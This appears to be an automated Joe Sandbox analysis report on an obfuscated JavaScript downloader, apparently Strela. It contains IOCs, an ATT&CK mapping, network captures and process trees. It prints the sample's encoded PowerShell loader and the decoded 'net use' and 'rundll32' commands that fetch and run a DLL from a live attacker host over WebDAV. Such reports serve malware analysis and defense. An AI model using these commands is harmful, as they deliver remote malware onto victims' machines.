Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,Entry
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiab1ahmazqagafwaxabhahaaaqb0aguacwb0agwayqbiahmalgbjag8abqbaadgaoaa4adgaxabkageadgb3ahcadwbyag8abwb0afwaiaa7acaacgb1ag4azabsagwamwayacaaxabcageacabpahqazqbzahqababhagiacwauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaayadeaoaa1adcamqa5adqamga1adyaoqayac4azabsagwalabfag4adabyahka
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information

Source: C:\Windows\System32\rundll32.exe | File opened: \\apitestlabs.com@8888\davwwwroot\2185719425692.dll
MITRE ATT&CK Matrix (by tactic)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Scripting (32); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Command and Scripting Interpreter (1); Exploitation for Client Execution (1); PowerShell (2); Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: Scripting (32); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Virtualization/Sandbox Evasion (21); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Rundll32 (1); DLL Side-Loading (1); Compile After Delivery
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Network Share Discovery (1); Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (12)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Non-Standard Port (11); Non-Application Layer Protocol (1); Application Layer Protocol (1); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

      No Antivirus matches
Source | Detection | Scanner | Label
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
apitestlabs.com | 94.159.113.48 | true | true | - | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://apitestlabs.com:8888/N | net.exe, 00000004.00000002.1405726227.0000015D70DF0000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://apitestlabs.com:8888/~ | net.exe, 00000004.00000002.1405726227.0000015D70DF0000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://apitestlabs.com:8888/ | net.exe, 00000004.00000002.1405726227.0000015D70DF0000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1405345735.0000015D70E1C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1405796900.0000015D70E1C000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1408331750.000001898B3F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1408331750.000001898B3DD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1408331750.000001898B391000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
94.159.113.48 | apitestlabs.com | Russian Federation | 49531 | NETCOM-R-ASRU | true
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1541208
              Start date and time:2024-10-24 15:21:09 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 2m 37s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • GSI enabled (Javascript)
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:171596613219316174.js
              Detection:MAL
              Classification:mal92.rans.troj.spyw.expl.evad.winJS@8/3@1/1
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 1
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .js
              • Stop behavior analysis, all processes terminated
              • Exclude process from analysis (whitelisted): dllhost.exe
              • Excluded IPs from analysis (whitelisted): 4.175.87.197
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
              • Execution Graph export aborted for target powershell.exe, PID 712 because it is empty
• Not all processes were analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: 171596613219316174.js
Time | Type | Description
09:22:08 | API Interceptor | 1x Sleep call for process: net.exe modified
IP context: 94.159.113.48 (Associated Sample Name: Detection, Threat Name; Context)
28807252352466216265.js: malicious, Strela Downloader; context: apitestlabs.com:8888/
28807252352466216265.js: malicious, Strela Downloader; context: apitestlabs.com:8888/
11625182393171315806.js: malicious, Strela Downloader; context: endpointexperiment.com:8888/
68767783000729717.js: malicious, Strela Downloader; context: apitestlabs.com:8888/
1118121357162151161.js: malicious, Strela Downloader; context: endpointexperiment.com:8888/
68767783000729717.js: malicious, Strela Downloader; context: apitestlabs.com:8888/
17233137582802518545.js: malicious, Strela Downloader; context: apitestlabs.com:8888/
27670210341875216956.js: malicious, Strela Downloader; context: apitestlabs.com:8888/
1118121357162151161.js: malicious, Strela Downloader; context: endpointexperiment.com:8888/
2216943291147226692.js: malicious, Strela Downloader; context: apitestlabs.com:8888/
Domain context: apitestlabs.com (Associated Sample Name: Detection, Threat Name; Context)
28807252352466216265.js: malicious, Strela Downloader; context: 94.159.113.48
28807252352466216265.js: malicious, Strela Downloader; context: 94.159.113.48
68767783000729717.js: malicious, Strela Downloader; context: 94.159.113.48
68767783000729717.js: malicious, Strela Downloader; context: 94.159.113.48
17233137582802518545.js: malicious, Strela Downloader; context: 94.159.113.48
27670210341875216956.js: malicious, Strela Downloader; context: 94.159.113.48
2216943291147226692.js: malicious, Strela Downloader; context: 94.159.113.48
14159121323322190.js: malicious, Strela Downloader; context: 94.159.113.48
1905917958281632044.js: malicious, Strela Downloader; context: 94.159.113.48
4190314692620623581.js: malicious, Strela Downloader; context: 94.159.113.48
ASN context: NETCOM-R-ASRU (Associated Sample Name: Detection, Threat Name; Context)
hidakibest.arm5.elf: malicious, Gafgyt, Mirai; context: 94.159.101.41
hidakibest.mpsl.elf: malicious, Gafgyt, Mirai; context: 94.159.101.41
hidakibest.ppc.elf: malicious, Gafgyt, Mirai; context: 94.159.101.41
hidakibest.mips.elf: malicious, Gafgyt, Mirai; context: 94.159.101.41
hidakibest.x86.elf: malicious, Mirai, Gafgyt; context: 94.159.101.41
hidakibest.arm6.elf: malicious, Gafgyt, Mirai; context: 94.159.101.41
hidakibest.sparc.elf: malicious, Gafgyt, Mirai; context: 94.159.101.41
hidakibest.arm4.elf: malicious, Gafgyt, Mirai; context: 94.159.101.41
28807252352466216265.js: malicious, Strela Downloader; context: 94.159.113.48
28807252352466216265.js: malicious, Strela Downloader; context: 94.159.113.48
              No context
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):64
              Entropy (8bit):0.773832331134527
              Encrypted:false
              SSDEEP:3:NlllulM/l:NllU
              MD5:21F14205CCD420521F20158797DD550F
              SHA1:69A2950F28967FFF781C85FAFDC91F49E1E2A624
              SHA-256:D021F470AB6D211BC08B4DF10B4FD039E582C5BA57F371828643329F9F76E7DE
              SHA-512:8858DF0A62E1FD3D2300CB5A4CF32A15762DDA3EE77DCE440F5382163EAA1A1973704DB2EA6C7D1BFF31C8BAF5F657791595D458BA4A7710FA453CB15833E0D7
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:@...e...........................................................
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Reputation:high, very likely benign file
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              File type:ASCII text, with very long lines (65536), with no line terminators
              Entropy (8bit):4.7110264324882
              TrID:
                File name:171596613219316174.js
                File size:1'418'795 bytes
                MD5:f4cf89a037227ea762cc6e1c9b286bf9
                SHA1:ba826a2e3023657b2efb471b52bc3425ed012b1f
                SHA256:9df87b2ca3327bdd843e791ae253b81f6ef1eeb765661c2dbea9d3c234a356da
                SHA512:979df89130a20e73d5b44065eef0857a45cc12c1084e9ea1f382ed27da978d457ac9d7b329e8afb69c4bac0ca8b74793c8446dde1521bdca465b04cb06c8a3b3
                SSDEEP:6144:qkzpt3+6ZvhiT8CAFlWDe6O1rM5My9FYhkM/5fe61DpF6LOFt6LM62tmt/heDRMS:/9hiT8CWc50MnDyDioVVSCtLBI5dE
                TLSH:6E659FAFECF839C8FE31914026E28B151E85FB313924D02D5934D9ED6748C93AD62D6E
                File Content Preview:tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjtceqxqbtfnhvplnymrjddkcuajrbjyeifthegypeiwecsjehbnjxgteambmvvpeacjmlvzqyadrraqtoiudfjwyjkmdjsgzwwsyxizbftgpspnbgllrqwlheajmyaorjinrmjhxzontueookxwlwksebhzajbfy
                Icon Hash:68d69b8bb6aa9a86
                Timestamp                             Source Port  Dest Port  Source IP       Dest IP
                Oct 24, 2024 15:22:07.740015984 CEST  49747        8888       192.168.2.9     94.159.113.48
                Oct 24, 2024 15:22:07.745429993 CEST  8888         49747      94.159.113.48   192.168.2.9
                Oct 24, 2024 15:22:07.745508909 CEST  49747        8888       192.168.2.9     94.159.113.48
                Oct 24, 2024 15:22:07.746166945 CEST  49747        8888       192.168.2.9     94.159.113.48
                Oct 24, 2024 15:22:07.751507998 CEST  8888         49747      94.159.113.48   192.168.2.9
                Oct 24, 2024 15:22:08.648264885 CEST  8888         49747      94.159.113.48   192.168.2.9
                Oct 24, 2024 15:22:08.696229935 CEST  49747        8888       192.168.2.9     94.159.113.48
                Oct 24, 2024 15:22:08.717217922 CEST  49747        8888       192.168.2.9     94.159.113.48

                Timestamp                             Source Port  Dest Port  Source IP       Dest IP
                Oct 24, 2024 15:22:07.722784042 CEST  51319        53         192.168.2.9     1.1.1.1
                Oct 24, 2024 15:22:07.732821941 CEST  53           51319      1.1.1.1         192.168.2.9

                Timestamp                             Source IP     Dest IP   Trans ID  OP Code             Name             Type            Class        DNS over HTTPS
                Oct 24, 2024 15:22:07.722784042 CEST  192.168.2.9   1.1.1.1   0x8356    Standard query (0)  apitestlabs.com  A (IP address)  IN (0x0001)  false

                Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name             CName  Address        Type            Class        DNS over HTTPS
                Oct 24, 2024 15:22:07.732821941 CEST  1.1.1.1    192.168.2.9  0x8356    No error (0)  apitestlabs.com         94.159.113.48  A (IP address)  IN (0x0001)  false

                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                0           192.168.2.9  49747        94.159.113.48   8888              2156  C:\Windows\System32\net.exe
                Timestamp                             Bytes transferred  Direction  Data
                Oct 24, 2024 15:22:07.746166945 CEST  109                OUT        OPTIONS / HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    User-Agent: DavClnt
                                                                                    translate: f
                                                                                    Host: apitestlabs.com:8888
                Oct 24, 2024 15:22:08.648264885 CEST  191                IN         HTTP/1.1 500 Internal Server Error
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Date: Thu, 24 Oct 2024 13:22:08 GMT
                                                                                    Content-Length: 22
                                                                                    Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
                                                                                    Data Ascii: Internal server error


                Target ID:0
                Start time:09:22:04
                Start date:24/10/2024
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js"
                Imagebase:0x7ff699fa0000
                File size:170'496 bytes
                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:2
                Start time:09:22:05
                Start date:24/10/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA
                Imagebase:0x7ff760310000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:09:22:05
                Start date:24/10/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff70f010000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:09:22:07
                Start date:24/10/2024
                Path:C:\Windows\System32\net.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\
                Imagebase:0x7ff7a8ee0000
                File size:59'904 bytes
                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:5
                Start time:09:22:08
                Start date:24/10/2024
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,Entry
                Imagebase:0x7ff766150000
                File size:71'680 bytes
                MD5 hash:EF3179D498793BF4234F708D3BE28633
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Call Graph

                • Executed
                • Not Executed
                [Call graph figure: entry (cluster C0) -> Function (cluster C2), edge E1C0->F3C2]

                Script:

                Code
                0
                tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                1 to 62
                (the same truncated preview is shown at each of the 62 nested levels)
                63
                Function ( '' + tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuz...
                • Function("return this") ➔ function anonymous()
                • () ➔
                • Windows Script Host.CreateObject("WScript.Shell") ➔
                • run("powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAA...",0,false) ➔ 0
                Memory Dump Source
                • Source File: 00000002.00000002.1410300104.00007FF886C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ff886c60000_powershell.jbxd